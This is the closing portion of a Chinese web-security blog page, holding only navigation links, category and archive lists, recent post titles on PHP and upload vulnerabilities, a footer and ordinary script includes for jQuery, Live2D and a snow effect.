  </div>
  
    
<nav id="article-nav">
  
    <a href="/2022/11/26/vulnerability/php%E4%BC%AA%E5%8D%8F%E8%AE%AE/" id="article-nav-newer" class="article-nav-link-wrap">
      <strong class="article-nav-caption">Newer</strong>
      <div class="article-nav-title">
        
          php伪协议
        
      </div>
    </a>
  
  
    <a href="/2022/11/18/vulnerability/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E/" id="article-nav-older" class="article-nav-link-wrap">
      <strong class="article-nav-caption">Older</strong>
      <div class="article-nav-title">文件上传漏洞</div>
    </a>
  
</nav>

  
</article>

</section>
        
          <aside id="sidebar">
  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Categories</h3>
    <div class="widget">
      <ul class="category-list"><li class="category-list-item"><a class="category-list-link" href="/categories/web%E5%AE%89%E5%85%A8/">web安全</a><span class="category-list-count">25</span><ul class="category-list-child"><li class="category-list-item"><a class="category-list-link" href="/categories/web%E5%AE%89%E5%85%A8/CTF/">CTF</a><span class="category-list-count">2</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/web%E5%AE%89%E5%85%A8/%E4%B9%A6%E7%B1%8D/">书籍</a><span class="category-list-count">1</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/web%E5%AE%89%E5%85%A8/%E5%AE%9E%E6%88%98/">实战</a><span class="category-list-count">1</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/web%E5%AE%89%E5%85%A8/%E5%B7%A5%E5%85%B7/">工具</a><span class="category-list-count">3</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/web%E5%AE%89%E5%85%A8/%E6%80%9D%E7%BB%B4%E5%AF%BC%E5%9B%BE/">思维导图</a><span class="category-list-count">1</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/web%E5%AE%89%E5%85%A8/%E6%BC%8F%E6%B4%9E/">漏洞</a><span class="category-list-count">14</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/web%E5%AE%89%E5%85%A8/%E9%9D%A2%E8%AF%95%E9%A2%98/">面试题</a><span class="category-list-count">3</span><ul class="category-list-child"><li class="category-list-item"><a class="category-list-link" href="/categories/web%E5%AE%89%E5%85%A8/%E9%9D%A2%E8%AF%95%E9%A2%98/XSS/">XSS</a><span class="category-list-count">1</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/web%E5%AE%89%E5%85%A8/%E9%9D%A2%E8%AF%95%E9%A2%98/%E6%96%87%E4%BB%B6%E4%B8%8A%E4%BC%A0%E6%BC%8F%E6%B4%9E/">文件上传漏洞</a><span class="category-list-count">1</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/web%E5%AE%89%E5%85%A8/%E9%9D%A2%E8%AF%95%E9%A2%98/%E6%9A%B4%E5%8A%9B%E7%A0%B4%E8%A7%A3/">暴力破解</a><span class="category-list-count">1</span></li></ul></li></ul></li><li class="category-list-item"><a class="category-list-link" href="/categories/%E5%85%B4%E8%B6%A3/">兴趣</a><span class="category-list-count">4</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/%E5%8C%BA%E5%9D%97%E9%93%BE%E5%AE%89%E5%85%A8/">区块链安全</a><span class="category-list-count">1</span><ul class="category-list-child"><li class="category-list-item"><a class="category-list-link" href="/categories/%E5%8C%BA%E5%9D%97%E9%93%BE%E5%AE%89%E5%85%A8/%E5%8D%9A%E5%BC%88%E8%AE%BA/">博弈论</a><span class="category-list-count">1</span></li></ul></li><li class="category-list-item"><a class="category-list-link" href="/categories/%E5%AD%A6%E4%B9%A0%E5%88%86%E4%BA%AB/">学习分享</a><span class="category-list-count">3</span></li><li class="category-list-item"><a class="category-list-link" href="/categories/%E5%AF%86%E7%A0%81%E5%AD%A6/">密码学</a><span class="category-list-count">1</span></li></ul>
    </div>
  </div>


  
    

  
    
  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Archives</h3>
    <div class="widget">
      <ul class="archive-list"><li class="archive-list-item"><a class="archive-list-link" href="/archives/2022/12/">December 2022</a><span class="archive-list-count">6</span></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2022/11/">November 2022</a><span class="archive-list-count">7</span></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2022/10/">October 2022</a><span class="archive-list-count">5</span></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2022/09/">September 2022</a><span class="archive-list-count">1</span></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2022/08/">August 2022</a><span class="archive-list-count">2</span></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2022/07/">July 2022</a><span class="archive-list-count">3</span></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2022/06/">June 2022</a><span class="archive-list-count">1</span></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2022/05/">May 2022</a><span class="archive-list-count">1</span></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2022/04/">April 2022</a><span class="archive-list-count">2</span></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2022/03/">March 2022</a><span class="archive-list-count">1</span></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2022/01/">January 2022</a><span class="archive-list-count">2</span></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2021/09/">September 2021</a><span class="archive-list-count">1</span></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2021/07/">July 2021</a><span class="archive-list-count">2</span></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2021/04/">April 2021</a><span class="archive-list-count">1</span></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2021/03/">March 2021</a><span class="archive-list-count">1</span></li></ul>
    </div>
  </div>


  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Recent Posts</h3>
    <div class="widget">
      <ul>
        
          <li>
            <a href="/2022/12/09/vulnerability/phpinfo%E4%BF%A1%E6%81%AF%E5%88%A9%E7%94%A8/">php信息利用</a>
          </li>
        
          <li>
            <a href="/2022/12/09/CTF/%E5%88%B7%E9%A2%98/">刷题</a>
          </li>
        
          <li>
            <a href="/2022/12/09/interview/%E6%9A%B4%E5%8A%9B%E7%A0%B4%E8%A7%A3%E9%9D%A2%E8%AF%95%E9%A2%98/">暴力破解</a>
          </li>
        
          <li>
            <a href="/2022/12/08/Blockchain/%E5%8D%9A%E5%BC%88%E8%AE%BA/">博弈论</a>
          </li>
        
          <li>
            <a href="/2022/12/02/vulnerability/%E4%B8%AD%E5%8D%97%E6%B0%91%E6%97%8FVPN%E7%99%BB%E5%BD%95%E6%A1%86/">中南民族VPN登录框</a>
          </li>
        
      </ul>
    </div>
  </div>

  
</aside>
        
      </div>
      <footer id="footer">
  
  <div class="outer">
    <div id="footer-info" class="inner">
      &copy; 2022 草莓布丁<br>
      Powered by <a href="http://hexo.io/" target="_blank">Hexo</a>
    </div>
  </div>
</footer>
    </div>
    <nav id="mobile-nav">
  
    <a href="/" class="mobile-nav-link">Home</a>
  
    <a href="/categories/%E5%AD%A6%E4%B9%A0%E5%88%86%E4%BA%AB/" class="mobile-nav-link">学习分享</a>
  
    <a href="/categories/web%E5%AE%89%E5%85%A8/" class="mobile-nav-link">安全</a>
  
    <a href="/categories/%E5%85%B4%E8%B6%A3/" class="mobile-nav-link">兴趣</a>
  
    <a href="/richang" class="mobile-nav-link">日常</a>
  
</nav>
    

<script src="//ajax.googleapis.com/ajax/libs/jquery/2.0.3/jquery.min.js"></script>


  
<link rel="stylesheet" href="/fancybox/jquery.fancybox.css">

  
<script src="/fancybox/jquery.fancybox.pack.js"></script>




<script src="/js/script.js"></script>




  </div>
<script src="/live2dw/lib/L2Dwidget.min.js?094cbace49a39548bed64abff5988b05"></script><script>L2Dwidget.init({"model":{"jsonPath":"/live2dw/assets/tororo.model.json"},"display":{"position":"left","width":200,"height":300},"mobile":{"show":true},"log":false,"pluginJsPath":"lib/","pluginModelPath":"assets/","pluginRootPath":"live2dw/","tagMode":false});</script></body>
<script type="text/javascript" src="http://libs.baidu.com/jquery/1.8.3/jquery.js"></script>
<script type="text/javascript" src="http://libs.baidu.com/jquery/1.8.3/jquery.min.js"></script>
<!-- 雪花特效 -->
<script type="text/javascript" src="\js\snow.js"></script>
</html>